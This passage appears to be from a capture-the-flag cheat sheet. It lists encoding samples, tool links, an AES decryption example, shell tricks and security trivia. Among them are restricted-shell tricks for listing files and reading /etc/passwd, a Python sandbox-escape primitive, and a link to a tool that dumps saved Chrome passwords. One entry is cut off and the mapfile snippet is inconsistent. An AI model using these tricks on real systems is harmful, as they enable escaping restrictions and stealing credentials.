ORUGS4ZANFZSAYLOEBSXQYLNOBWGKIDPMYQGEYLTMUZTELRANF2CA2LTEB3GS43JMJWGKIDCPEQGY33UOMQG6ZRAMNQXA2LUMFWCA3DFOR2GK4TTEBQW4ZBANVXXEZJAMVYXKYLMOMQHG2LHNZZSAZTPOIQHAYLEMRUW4ZZMEBSXQ5DSME======
Base85:
<~9jqo^BlbD-BleB1DJ+*+F(f,q/0JhKF<GL>Cj@.4Gp$d7F!,L7@<6@)/0JDEF<G%<+EV:2F!,
O<DJ+*.@<*K0@<6L(Df-\0Ec5e;DffZ(EZee.Bl.9pF"AGXBPCsi+DGm>@3BB/F*&OCAfu2/AKY
i(DIb:@FD,*)+C]U=@3BN#EcYf8ATD3s@q?d$AftVqCh[NqF<G:8+EV:.+Cf>-FD5W8ARlolDIa
l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
>uD.RTpAKYo'+CT/5+Cei#DII?(E,9)oF*2M7/c~>
Base91:
8D$J`/wC4!c.hQ;mT8,<p/&Y/H@$]xlL3oDg<W.0$FW6GFMo_D8=8=}AMf][|LfVd/<P1o/1Z2(.I+LR6tQQ0o1a/2/WtN3$3t[x&k)zgZ5=p;LRe.{B[pqa(I.WRT%yxtB92oZB,2,Wzv;Rr#N.cju"JFXiZBMf<WMC&$@+e95p)z01_*UCxT0t88Km=UQJ;WH[#F]4pE>i3o(g7=$e7R2u>xjLxoefB.6Yy#~uex8jEU_1e,MIr%!&=EHnLBn2h>M+;Rl3qxcL5)Wfc,HT$F]4pEsofrFK;W&eh#=#},|iKB,2,W]@fVlx,a<m;i=CY<=Hb%}+},F
  • Base65535

    Unicode characters encoding. Includes a lot of seemingly random spaces and chinese characters!

𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ
  • Base41

  • Mac / Macintosh / Apple Hidden Files .DS_Store ds_store_exp

    On Mac computers, there is a hidden index file .DS_Store. You might be able to find it if you have an LFI vulnerability or something of the like. A good tool to track these down on a website is the DS_Store Exposer: https://github.com/lijiejie/ds_store_exp.

  • Wordsearches

    Some CTFs have me solve wordsearchs as part of a challenge (TJCTF 2018). This code is super helpful: https://github.com/robbiebarrat/word-search

  • "Unflattening" Base64 in lowercase or uppercase

    Some time ago we needed to recover the original Base64 string from one that is in all lowercase or all uppercase. Caleb wrote a good script to smartly do this: https://pastebin.com/HprZcHrY

  • Password-protected Zip Files: fcrackzip and zip2john.py

    Use

  • 15 Puzzle

    A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/

  • SETUID Binary Methodology

    Don't forget to check "simple" things --- it doesn't need to be a pwn or binary exploitation challenge, keep in mind IT DOES NOT use a secure PATH like sudo.

  • Chrome Password Dump

    A Windows command-line tool to dump passwords saved with Google Chrome. http://securityxploded.com/chrome-password-dump.php

  • img2txt

    A command-line tool to convert an image into ASCII for the terminal. Can be installed like so:

sudo apt install -y caca-utils
  • Strange Symbols/Characters

    Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searching these. They may be Egyptian Characters:

http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif

  • Bitcoin

    You might see a private Bitcoin key as a base64 encoded SHA256 hash, like this:

NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==
Decoded, it is a hash: `5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751`.

If you can find an AES ECB key along with (usually represented in hex or another encoding), you can decipher like so:
openssl enc -d -aes-256-ecb -in <(printf %s '5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751' | xxd -r -p) -K '6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077'
MCA{I$love$bitcoin$so$much!}
  • Missing ls or dir commands

    If you cannot run ls or dir, or find or grep, to list files you can use

echo *
echo /any/path/*
  • restricted bash (rbash) read files

    If you are a restricted shell like rbash you can still read any file with some builtin commands like mapfile:

mapfile -t  < /etc/passwd
printf "$s\n" "${anything[@]}"

Jail Breaks

Sometimes you're jailed in an environment where you can potentially execute code.

  • Python 3 ().__class__.__base__.__subclasses__() - Gives access to object subclasses

Trivia

  • Trivia Question: a reliable mechanism for websites to remember stateful information. Yummy!
Cookie
  • A group of binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation
base64
  • This CVE Proof of concept Shows NSA.gov playing "Never Gonna Give You Up," by 1980s heart-throb Rick Astley.
CVE-2020-0601
  • The British used this machine to crack the German Enigma machine messages.
Bombe
  • What is the Windows LM hash for a blank password?
aad3b435b51404eeaad3b435b51404ee
  • for Windows LM hashing, after the password is split into two 7 character chunks, they are used as DES keys to encrypt what string?
KGS!@#$%
  • I am the person responsible for stopping one of the worst ransomware. Who am I?
MalwareTech
  • I am used by devices for sending error messages. Who am I?
ICMP
  • We are a CTF team which is open to everybody. Who are we?
OpenToAll - https://opentoallctf.github.io/